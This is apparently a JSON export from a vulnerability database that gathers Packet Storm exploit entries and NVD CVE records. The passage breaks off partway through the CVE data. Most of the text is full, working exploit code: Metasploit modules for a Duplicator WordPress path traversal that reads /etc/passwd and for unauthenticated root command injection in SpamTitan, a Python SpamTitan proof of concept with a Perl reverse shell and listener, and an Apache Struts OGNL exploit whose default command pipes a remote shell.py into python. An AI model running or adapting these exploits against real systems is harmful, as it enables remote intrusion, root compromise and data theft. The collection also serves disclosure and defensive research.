This vulnerability was being actively exploited when it was discovered.}, \n'References' => \n[ \n['CVE', '2020-11738'], \n['WPVDB', '10078'], \n['URL', 'https://snapcreek.com/duplicator/docs/changelog'] \n], \n'Author' => \n[ \n'Ramuel Gall', # Vulnerability discovery \n'Hoa Nguyen - SunCSR Team' # Metasploit module \n], \n'DisclosureDate' => 'Feb 19 2020', \n'License' => MSF_LICENSE \n)) \nregister_options( \n[ \nOptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), \nOptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5]) \n]) \nend \ndef check \n# The plugin is installed under wp-content/plugins/duplicator/, so that is the slug whose readme is checked \ncheck_plugin_version_from_readme('duplicator', '1.3.27', '1.3.24') \nend \ndef run_host(ip) \ntraversal = '../' * datastore['DEPTH'] \nfilename = datastore['FILEPATH'] \n# strip a leading slash so the traversal prefix is applied to a relative path \nfilename = filename[1, filename.length] if filename =~ /^\\// \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path,'wp-admin', 'admin-ajax.php'), \n'vars_get' => \n{ \n'action' => 'duplicator_download', \n'file' => \"#{traversal}#{filename}\" \n} \n}) \nfail_with Failure::Unreachable, 'Connection failed' unless res \nfail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' if res.code != 200 \nfail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? 
\nprint_status('Downloading file...') \nprint_line(\"\\n#{res.body}\\n\") \nfname = datastore['FILEPATH'] \npath = store_loot( \n'duplicator.traversal', \n'text/plain', \nip, \nres.body, \nfname \n) \nprint_good(\"File saved in: #{path}\") \nend \nend \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/160621/wpduplicator-traversal.rb.txt"}, {"lastseen": "2021-01-05T16:57:30", "description": "", "cvss3": {}, "published": "2021-01-05T00:00:00", "type": "packetstorm", "title": "SpamTitan 7.07 Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11698"], "modified": "2021-01-05T00:00:00", "id": "PACKETSTORM:160809", "href": "https://packetstormsecurity.com/files/160809/SpamTitan-7.07-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::SNMPClient \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SpamTitan Unauthenticated RCE', \n'Description' => %q{ \nTitanHQ SpamTitan Gateway is an anti-spam appliance that protects against \nunwanted emails and malware. This module exploits improper input \nsanitization in versions 7.01, 7.02, 7.03 and 7.07 to inject command directives \ninto the SNMP configuration file and get remote code execution as root. Note \nthat only version 7.03 needs authentication; no authentication is required \nfor versions 7.01, 7.02 and 7.07. \n \nFirst, it sends an HTTP POST request to the `snmp-x.php` page with an `SNMPD` \ncommand directive (`extend` + command) passed in the `community` parameter. 
\nThis payload is then added to `snmpd.conf` by the application. Finally, the \nmodule triggers the execution of this command by querying the SNMP server for \nthe correct OID. \n \nThis exploit module has been successfully tested against versions 7.01, 7.02, \n7.03, and 7.07. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Christophe De La Fuente', # MSF module \n'Felipe Molina' # original PoC \n], \n'References' => \n[ \n[ 'EDB', '48856' ], \n[ 'URL', 'https://www.titanhq.com/spamtitan/spamtitangateway/'], \n[ 'CVE', '2020-11698'] \n], \n'CmdStagerFlavor' => %i[fetch wget curl], \n'Payload' => { \n'DisableNops' => true \n}, \n'Targets' => \n[ \n[ \n'Unix In-Memory', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }, \n'Payload' => { \n'BadChars' => \"\\\\'#\", \n'Encoder' => 'cmd/perl', \n'PrependEncoder' => '/bin/tcsh -c \\'', \n'AppendEncoder' => '\\'#', \n'Space' => 470 \n}, \n'Type' => :unix_memory \n} \n], \n[ \n'FreeBSD Dropper (x64)', \n{ \n'Platform' => 'bsd', \n'Arch' => [ARCH_X64], \n'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' }, \n'Payload' => { \n'BadChars' => \"'#\", \n'Space' => 450 \n}, \n'Type' => :bsd_dropper \n} \n], \n[ \n'FreeBSD Dropper (x86)', \n{ \n'Platform' => 'bsd', \n'Arch' => [ARCH_X86], \n'DefaultOptions' => { 'PAYLOAD' => 'bsd/x86/shell_reverse_tcp' }, \n'Payload' => { \n'BadChars' => \"'#\", \n'Space' => 450 \n}, \n'Type' => :bsd_dropper \n} \n] \n], \n'DisclosureDate' => '2020-04-17', \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK] \n} \n) \n) \nregister_options( \n[ \nOpt::RPORT(80, true, 'The target HTTP port'), \nOptPort.new('SNMPPORT', [ true, 'The target SNMP port (UDP)', 161 ]), \nOptString.new('TARGETURI', [ true, 'The base path to SpamTitan', '/' ]), \nOptString.new( \n'USERNAME', \n[ \nfalse, \n'Username to authenticate, if 
required (depending on SpamTitan Gateway version)', \n'admin' \n] \n), \nOptString.new( \n'PASSWORD', \n[ \nfalse, \n'Password to authenticate, if required (depending on SpamTitan Gateway version)', \n'hiadmin' \n] \n), \nOptString.new( \n'COMMUNITY', \n[ \nfalse, \n'The SNMP Community String to use (random string by default)', \nRex::Text.rand_text_alpha(8) \n] \n), \nOptString.new( \n'ALLOWEDIP', \n[ \nfalse, \n'The IP address that will be allowed to query the injected `extend` '\\ \n'command. This IP will be added to the SNMP configuration file on the '\\ \n'target. This is typically this host\\'s IP address, but can be different if '\\ \n'you are in a NAT\\'ed network. If not set, `LHOST` will be used '\\ \n'instead. If `LHOST` is not set, it will default to `127.0.0.1`.' \n] \n), \n], self.class \n) \nend \n \ndef check \nsnmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php') \nvprint_status(\"Check if #{snmp_x_uri} exists\") \nres = send_request_cgi( \n'uri' => snmp_x_uri, \n'method' => 'GET' \n) \n \nif res.nil? \nreturn Exploit::CheckCode::Unknown.new( \n\"Could not connect to SpamTitan vulnerable page (#{snmp_x_uri}) - no response\" \n) \nend \n \nif res.code == 302 \nvprint_status( \n'This version of SpamTitan requires authentication. Trying with the '\\ \n'provided credentials.' \n) \nres = send_request_cgi( \n'uri' => '/index.php', \n'method' => 'POST', \n'vars_post' => { \n'jaction' => 'none', \n'language' => 'en_US', \n'address' => datastore['USERNAME'], \n'passwd' => datastore['PASSWORD'] \n} \n) \nif res.nil? 
\nreturn Exploit::CheckCode::Safe.new('Unable to authenticate - no response') \nend \n \nif res.code == 200 && res.body =~ /Invalid username or password/ \nreturn Exploit::CheckCode::Safe.new( \n'Unable to authenticate - Invalid username or password' \n) \nend \nunless res.code == 302 \nreturn Exploit::CheckCode::Unknown.new( \n\"Unable to authenticate - Unexpected HTTP response code: #{res.code}\" \n) \nend \n \n# For whatever reason, the web application sometimes returns multiple \n# PHPSESSID cookies and only the last one is valid. So, make sure only \n# the valid one is part of the cookie_jar. \ncookies = res.get_cookies.split(' ') \nphp_session = cookies.select { |cookie| cookie.starts_with?('PHPSESSID=') }.last \ncookie_jar.clear \ncookie_jar.add(php_session) \nremaining_cookies = cookies.delete_if { |cookie| cookie.starts_with?('PHPSESSID=') } \ncookie_jar.merge(remaining_cookies) \n \nres = send_request_cgi( \n'uri' => snmp_x_uri, \n'method' => 'GET' \n) \nend \n \nunless res.code == 200 \nreturn Exploit::CheckCode::Safe.new( \n\"Could not connect to SpamTitan vulnerable page (#{snmp_x_uri}) - \"\\ \n\"unexpected HTTP response code: #{res.code}\" \n) \nend \n \nExploit::CheckCode::Appears \nrescue ::Rex::ConnectionError => e \nvprint_error(\"Connection error: #{e}\") \nreturn Exploit::CheckCode::Unknown.new( \n\"Could not connect to SpamTitan vulnerable page (#{snmp_x_uri})\" \n) \nend \n \ndef exploit \nif target['Type'] == :unix_memory \nexecute_command(payload.encoded) \nelse \nexecute_cmdstager(linemax: payload_info['Space'].to_i, noconcat: true) \nend \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\") \nend \n \ndef inject_payload(community) \nsnmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php') \nprint_status(\"Send a request to #{snmp_x_uri} and inject the payload\") \n \npost_params = { \n'jaction' => 'saveAll', \n'contact' => 'CONTACT', \n'name' => 'SpamTitan', \n'location' => 
'LOCATION', \n'community' => community \n} \n \n# First, grab the CSRF token, if any (depending on the version) \nres = send_request_cgi( \n'uri' => '/snmp.php', \n'method' => 'GET' \n) \nif res.code == 200 \ndoc = ::Nokogiri::HTML(res.body) \ncsrf_name = doc.xpath('//input[@name=\\'CSRFName\\']/attribute::value').first&.value \ncsrf_token = doc.xpath('//input[@name=\\'CSRFToken\\']/attribute::value').first&.value \nif csrf_name && csrf_token \nprint_status('CSRF token found') \npost_params['CSRFName'] = csrf_name \npost_params['CSRFToken'] = csrf_token \nend \nend \n \nres = send_request_cgi( \n'uri' => snmp_x_uri, \n'method' => 'POST', \n'vars_post' => post_params \n) \nif res.nil? \nfail_with(Failure::Unreachable, \n\"#{peer} - Unable to inject the payload - no response\") \nend \nunless res.code == 200 \nfail_with(Failure::UnexpectedReply, \n\"#{peer} - Unable to inject the payload - unexpected HTTP response \"\\ \n\"code: #{res.code}\") \nend \nbegin \njson_res = JSON.parse(res.body)['success'] \nrescue JSON::ParserError \njson_res = nil \nend \nunless json_res \nfail_with(Failure::UnexpectedReply, \n\"#{peer} - Unable to inject the payload - Unknown error: #{res.body}\") \nend \nend \n \ndef trigger_payload(name) \nprint_status('Send an SNMP Get-Request to trigger the payload') \n \n# RPORT needs to be specified since the default value is set to the web \n# service port. 
\nconnect_snmp(true, 'RPORT' => datastore['SNMPPORT']) \nbegin \nres = snmp.get(\"1.3.6.1.4.1.8072.1.3.2.3.1.1.8.#{name.bytes.join('.')}\") \nmsg = \"SNMP Get-Request response (status=#{res.error_status}): \"\\ \n\"#{res.each_varbind.map(&:value).join('|')}\" \nif res.error_status == :noError \nvprint_good(msg) \nelse \nvprint_error(msg) \nend \nrescue SNMP::RequestTimeout, IOError \n# not always expecting a response here, so timeout is likely to happen \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nif target['Type'] == :bsd_dropper \n# 'tcsh' is the default shell on FreeBSD \n# Also, make sure it runs in background (&) to avoid blocking \ncmd = \"/bin/tcsh -c '#{[cmd.gsub('\\'', '\\\\\\\\\\'').gsub('\\\\', '\\\\\\\\\\\\')].shelljoin}&'#\" \nend \nname = Rex::Text.rand_text_alpha(8) \nip = datastore['ALLOWEDIP'] || datastore['LHOST'] || '127.0.0.1' \nif ip == '127.0.0.1' \nprint_warning( \n'Neither ALLOWEDIP nor LHOST has been set, so 127.0.0.1 will be used '\\ \n'instead. It will probably fail to trigger the payload.' \n) \nend \n \n# The injected payload consists of two lines: \n# 1. the community string and the IP address allowed to query this \n# community string \n# 2. the `extend` keyword, the name token used to trigger the payload \n# and the actual command to execute \ncommunity = \"#{datastore['COMMUNITY']}\\\" #{ip}\\nextend #{name} #{cmd}\" \ninject_payload(community) \n \n# The previous HTTP POST request made the application restart the SNMPD \n# service. So, wait a bit to make sure it is running. 
\nsleep(2) \n \ntrigger_payload(name) \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160809/spamtitan_unauth_rce.rb.txt"}, {"lastseen": "2020-10-05T18:00:39", "description": "", "cvss3": {}, "published": "2020-10-05T00:00:00", "type": "packetstorm", "title": "SpamTitan 7.07 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11698"], "modified": "2020-10-05T00:00:00", "id": "PACKETSTORM:159470", "href": "https://packetstormsecurity.com/files/159470/SpamTitan-7.07-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: SpamTitan 7.07 - Unauthenticated Remote Code Execution \n# Date: 2020-09-18 \n# Exploit Author: Felipe Molina (@felmoltor) \n# Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ \n# Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway \n# Version: 7.07 \n# Tested on: FreeBSD \n# CVE : CVE-2020-11698 \n \n---[SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in \nsnmp-x.php]------------------------------ \n \nSECURITY ADVISORY: SPUK-2020-09/SpamTitan Unauthenticated Remote \nCode Execution in snmp-x.php \nAffected Software: SpamTitan Gateway 7.07 (possibly earlier versions) \nVulnerability: Unauthenticated Remote Code Execution \nCVSSv3: 10.0 \n(https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) \nSeverity: Critical \nRelease Date: 2020-04-17 \nCVE: CVE-2020-11698 \n \nI. Background \n~~~~~~~~~~~~ \n \nFrom www.spamtitan.com: \n \n\"SpamTitan Gateway is a powerful Anti-Spam appliance that equips network \nadministrators with extensive tools to control mail flow and protect against \nunwanted email and malware.\" \n \nII. Description \n~~~~~~~~~~~~~~ \nImproper input sanitization of the parameter \"community\" on the page \nsnmp-x.php would allow a remote attacker to inject command directives into the \nfile snmpd.conf. 
This would allow executing commands on the target server by \nby injecting an \"extend\" or \"exec\" SNMPD directive and querying the snmp daemon \nof the server for the correct OID. \n \nIII. PoC \n~~~~~~~ \n \nUse python 3 and install the following modules: requests, pysnmp. \nIf your IP is 192.168.1.5 and the target SpamTitan server is \nspamtitan.example.com, call the PoC like this: \n./poc.py -t spamtitan.example.com -i 192.168.1.5 \n \n--------------------------------------------- \n \n#!/usr/bin/env python \n \n# Author: Felipe Molina (@felmoltor) \n# Date: 09/04/2020 \n# Python Version: 3.7 \n# Summary: This is PoC for an unauthenticated RCE 0day on SpamTitan \n7.07 and previous versions. \n# The script abuses of two weaknesses on the product: \n# 1. Unauthenticated interaction with snmp-x.php script \n# 2. Injection of snmpd.conf configuration directives in multiple POST \nparameters such as \"community\" or \"user_username\" of snmp-x.php \n# Product URL: https://www.spamtitan.com/ \n# Product Version: 7.07 and probably previous \n \nimport requests \nrequests.packages.urllib3.disable_warnings() \nimport os \nimport threading \nfrom optparse import OptionParser \nimport socket \nimport json \nfrom pysnmp.hlapi import * \nfrom urllib.parse import urlparse \nfrom time import sleep \n \nSNMPGETDELAY=5 \n \ndef parseoptions(): \nparser = OptionParser() \nparser.add_option(\"-t\", \"--target\", dest=\"target\", \nhelp=\"Target SpamTitan URL to attack. E.g.: \nhttps://spamtitan.com/\", default=None) \nparser.add_option(\"-i\", \"--ip\", dest=\"ip\", \nhelp=\"Local IP where to listen for the reverse \nshell. Default: %s\" % myip(), default=myip()) \nparser.add_option(\"-p\", \"--port\", dest=\"port\", \nhelp=\"Local Port where to listen for the reverse \nshell. Default: 4242\", default=4242) \nparser.add_option(\"-q\", \"--quiet\", \naction=\"store_true\", dest=\"quiet\", default=False, \nhelp=\"Shut up script! 
Just give me the shell.\") \n \nreturn parser.parse_args() \n \ndef printmsg(msg,quiet=False,msgtype=\"i\"): \nif (not quiet): \nif (success): \nprint(\"[%s] %s\" % (msgtype,msg)) \nelse: \nprint(\"[-] %s\" % msg) \n \ndef info(msg,quiet=False): \nprintmsg(msg,quiet,msgtype=\"i\") \n \ndef success(msg,quiet=False): \nprintmsg(msg,quiet,msgtype=\"+\") \n \ndef fail(msg,quiet=False): \nprintmsg(msg,quiet,msgtype=\"-\") \n \ndef myip(): \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \ntry: \n# doesn't even have to be reachable \ns.connect(('10.255.255.255', 1)) \nIP = s.getsockname()[0] \nexcept: \nIP = '127.0.0.1' \nfinally: \ns.close() \nreturn IP \n \n \ndef shellServer(ip,port,quiet): \nservers = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nservers.bind((ip, port)) \nservers.listen(1) \ninfo(\"Waiting for incoming connection on %s:%s\" % (ip,port)) \nconn, addr = servers.accept() \nconn.settimeout(1) \nsuccess(\"Hurray, we got a connection from %s\" % addr[0]) \n \nprompt =conn.recv(128) \nprompt=str(prompt.decode(\"utf-8\")).strip() \ncommand = input(prompt) \n \nwhile True: \ntry: \nc = \"%s\\n\" % (command) \nif (len(c)>0): \nconn.sendall(c.encode(\"utf-8\")) \n# Quit the console \nif command == 'exit': \ninfo(\"\\nClosing connection\") \nconn.close() \nbreak \nelse: \ncompleteanswer=\"\" \nwhile True: \nanswer=None \ntry: \nanswer=str((conn.recv(1024)).decode(\"utf-8\")) \ncompleteanswer+=answer \nexcept socket.timeout: \ncompleteanswer.strip() \nbreak \nprint(completeanswer,end='') \ncommand = input(\"\") \nexcept (KeyboardInterrupt, EOFError): \ninfo(\"\\nClosing connection\") \nbreak \n \ndef triggerSNMPShell(target, community, triggeroid, port, quiet): \nif (not quiet): \nprint(\"Waiting %s seconds to allow the main thread set-up the \nshell listener.\" % SNMPGETDELAY) \n# Give the parent thread a few seconds to set up the shell \nlistener before triggering the SNMP get query \nsleep(SNMPGETDELAY) \nif (not quiet): \nprint(\"Querying the 
SNMP server to launch the shell.\") \ntargetp = urlparse(target) \nerrorIndication, errorStatus, errorIndex, varBinds = next( \ngetCmd(SnmpEngine(), \nCommunityData(community, mpModel=0), \nUdpTransportTarget((targetp.netloc, port)), \nContextData(), \nObjectType(ObjectIdentity(triggeroid))) \n) \nif errorIndication: \nprint(\"SNMP error: %s\" % errorIndication) \nelif errorStatus: \nprint('SNMP error status: %s at %s' % (errorStatus.prettyPrint(), \nerrorIndex and varBinds[int(errorIndex) - \n1][0] or '?')) \n \ndef main(): \n(options,arguments) = parseoptions() \nq = options.quiet \nt = options.target \ni = options.ip \np = options.port \ncommunity=\"dummy\" \n \nif (t is None): \nprint(\"[-] Error. Specify a target (-t).\") \nexit() \n \nif ((not \"http://\" in t) and (not \"https://\" in t)): \nt = \"http://%s/snmp-x.php\" % t \nelse: \nt = \"%s/snmp-x.php\" % t \n \nif (not q): \nprint(\"[+] Attacking: %s.\\nReceiving shell in %s:%s\" % (t,i,p)) \n \nTARGETOID=\".1.3.6.1.4.1.8072.1.3.2.3.1.1.8.114.101.118.115.104.101.108.108\" \n# PAYLOAD=\"extend revshell /usr/bin/perl -e 'use \nSocket;$i=\\\"%s\\\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh \n-i\\\");};'\" % (i,p) \nPAYLOAD=\"extend revshell /usr/bin/perl -e 'use \nSocket;$i=\\\"%s\\\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh \n-i\\\");};'\" % (i,p) \nTOGGLESNMP={ \n\"jaction\":\"toggleSNMP\", \n\"newval\":\"1\" \n} \nINJECTION={ \n\"jaction\":\"saveAll\", \n\"contact\":\"CONTACT\", \n\"name\":\"SpamTitan\", \n\"location\":\"LOCATION\", \n# Add our IP as allowed to query the injected \"dummy\" community \n# Add also the perl payload in a new line (%0a) of the snmpd.conf file \n\"community\":'%s\" 
%s\\n%s # ' % (community,i,PAYLOAD) \n} \n \nrev_thread = threading.Thread(target=triggerSNMPShell, args=(t, \ncommunity, TARGETOID, 161,q)) \nrev_thread.start() \n \n# Start a thread to listen for incoming reverse shells: \nif (not q): \nprint(\"[+] Launching a reverse shell listener to wait for the shell.\") \n \n# Send the SNMP request to add a community and append an \"extend\" \ncommand to execute scripts \n# SpamTitan would add a new line in the snmpd.conf file with the \nnew community name and the \"extend\" script \ninj_res = requests.post(t,INJECTION,verify=False) \nif (inj_res.status_code == 200): \nif (not q): \nprint(\"Spawning a reverse shell listener. Wait for it...\") \nshellServer(options.ip,int(options.port),options.quiet) \nelse: \nprint(\"Error. The target is probably not vulnerable (returned \na %s code).\" % inj_res.status_code) \n \nmain() \n \n--------------------------------------------- \n \nIII. Impact \n~~~~~~~~~~ \n \nThe snmpd daemon is running as root in the target server. The \npresented PoC would return a root shell without need of any \nregistered user in the target server. There is total loss of \nconfidentiality, integrity and availability on the SpamTitan server. \n \nIV. Disclosure \n~~~~~~~~~~~~~ \n \nReported By: Felipe Molina de la Torre \n \nVendor Informed: 2020-04-17 \nPatch Release Date: 2020-05-26 \nAdvisory Release Date: 2019-09-18 \n \nV. 
References \n~~~~~~~~~~~~ \n* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698 \n* https://sensepost.com/blog/2020/clash-of-the-spamtitan/ \n \n---------------------------------[SPUK-2020-09/SpamTitan \nUnauthenticated Remote Code Execution in snmp-x.php]--- \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159470/spamtitan707snmp-exec.txt"}, {"lastseen": "2020-11-18T03:43:19", "description": "", "cvss3": {}, "published": "2020-11-17T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.5.20 Double OGNL Evaluation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-0230"], "modified": "2020-11-17T00:00:00", "id": "PACKETSTORM:160108", "href": "https://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html", "sourceData": "`# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation \n# Date: 08/18/2020 \n# Exploit Author: West Shepherd \n# Vendor Homepage: https://struts.apache.org/download.cgi \n# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) \n# CVE : CVE-2019-0230 \n# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. 
\n# Source(s): \n# https://github.com/PrinceFPF/CVE-2019-0230 \n# https://cwiki.apache.org/confluence/display/WW/S2-059 \n# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 \n \n# !/usr/bin/python \nfrom sys import argv, exit, stdout, stderr \nimport argparse \nimport requests \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nimport logging \n \n \nclass Exploit: \ndef __init__( \nself, \ntarget='', \nredirect=False, \nproxy_address='' \n): \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nself.target = target \nself.session = requests.session() \nself.redirect = redirect \nself.timeout = 0.5 \nself.proxies = { \n'http': 'http://%s' % proxy_address, \n'https': 'http://%s' % proxy_address \n} \\ \nif proxy_address is not None \\ \nand proxy_address != '' else {} \nself.query_params = {} \nself.form_values = {} \nself.cookies = {} \nboundary = \"---------------------------735323031399963166993862150\" \nself.headers = { \n'Content-Type': 'multipart/form-data; boundary=%s' % boundary, \n'Accept': '*/*', \n'Connection': 'close' \n} \npayload = \"%{(#nike='multipart/form-data').\" \\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \\ \n\"(#_memberAccess?(#_memberAccess=#dm):\" \\ \n \n\"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \n\\ \n \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \n\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\" \\ \n\"(#ognlUtil.getExcludedClasses().clear()).\" \\ \n\"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').\" \\ \n \n\"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\" \n\\ \n \n\"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\" \\ \n\"(#p=new \njava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).\" \\ \n \n\"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" \n\\ \n 
\n\"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\" \n\\ \n\"(#ros.flush())}\" \n \nself.payload = \"--%s\\r\\nContent-Disposition: form-data; \nname=\\\"foo\\\"; \" \\ \n\"filename=\\\"%s\\0b\\\"\\r\\nContent-Type: \ntext/plain\\r\\n\\r\\nx\\r\\n--%s--\\r\\n\\r\\n\" % ( \nboundary, payload, boundary \n) \n \ndef do_get(self, url, params=None, data=None): \nreturn self.session.get( \nurl=url, \nverify=False, \nallow_redirects=self.redirect, \nheaders=self.headers, \ncookies=self.cookies, \nproxies=self.proxies, \ndata=data, \nparams=params \n) \n \ndef do_post(self, url, data=None, params=None): \nreturn self.session.post( \nurl=url, \ndata=data, \nverify=False, \nallow_redirects=self.redirect, \nheaders=self.headers, \ncookies=self.cookies, \nproxies=self.proxies, \nparams=params \n) \n \ndef debug(self): \ntry: \nimport http.client as http_client \nexcept ImportError: \nimport httplib as http_client \nhttp_client.HTTPConnection.debuglevel = 1 \nlogging.basicConfig() \nlogging.getLogger().setLevel(logging.DEBUG) \nrequests_log = logging.getLogger(\"requests.packages.urllib3\") \nrequests_log.setLevel(logging.DEBUG) \nrequests_log.propagate = True \nreturn self \n \ndef send_payload(self, command='curl --insecure -sv \nhttps://10.10.10.10/shell.py|python -'): \nurl = self.target \nstdout.write('sending payload to %s payload %s' % (url, command)) \nresp = self.do_post(url=url, params=self.query_params, \ndata=self.payload.replace('{COMMAND}', command)) \nreturn resp \n \n \nif __name__ == '__main__': \nparser = argparse.ArgumentParser(add_help=True, \ndescription='CVE-2020-0230 Struts \n2 exploit') \ntry: \nparser.add_argument('-target', action='store', help='Target \naddress: http(s)://target.com/index.action') \nparser.add_argument('-command', action='store', \nhelp='Command to execute: touch /tmp/pwn') \nparser.add_argument('-debug', action='store', default=False, \nhelp='Enable debugging: False') 
\nparser.add_argument('-proxy', action='store', default='', \nhelp='Enable proxy: 10.10.10.10:8080') \n \nif len(argv) == 1: \nparser.print_help() \nexit(1) \noptions = parser.parse_args() \n \nexp = Exploit( \nproxy_address=options.proxy, \ntarget=options.target \n) \n \nif options.debug: \nexp.debug() \nstdout.write('target %s debug %s proxy %s\\n' % ( \noptions.target, options.debug, options.proxy \n)) \n \nresult = exp.send_payload(command=options.command) \nstdout.write('Response: %d\\n' % result.status_code) \n \nexcept Exception as error: \n \nstderr.write('error in main %s' % str(error)) \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160108/apachestruts2520-eval.txt"}], "cve": [{"lastseen": "2023-06-06T14:48:26", "description": "The easy-wp-smtp plugin before 1.4.4 for WordPress allows Administrator account takeover, as exploited in the wild in December 2020. If an attacker can list the wp-content/plugins/easy-wp-smtp/ directory, then they can discover a log file (such as #############_debug_log.txt) that contains all password-reset links. 
The attacker can request a reset of the Administrator password and then use a link found there.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-14T03:15:00", "type": "cve", "title": "CVE-2020-35234", "cwe": ["CWE-532"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35234"], "modified": "2020-12-15T23:45:00", "cpe": [], "id": "CVE-2020-35234", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-35234", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-06-06T14:16:55", "description": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 
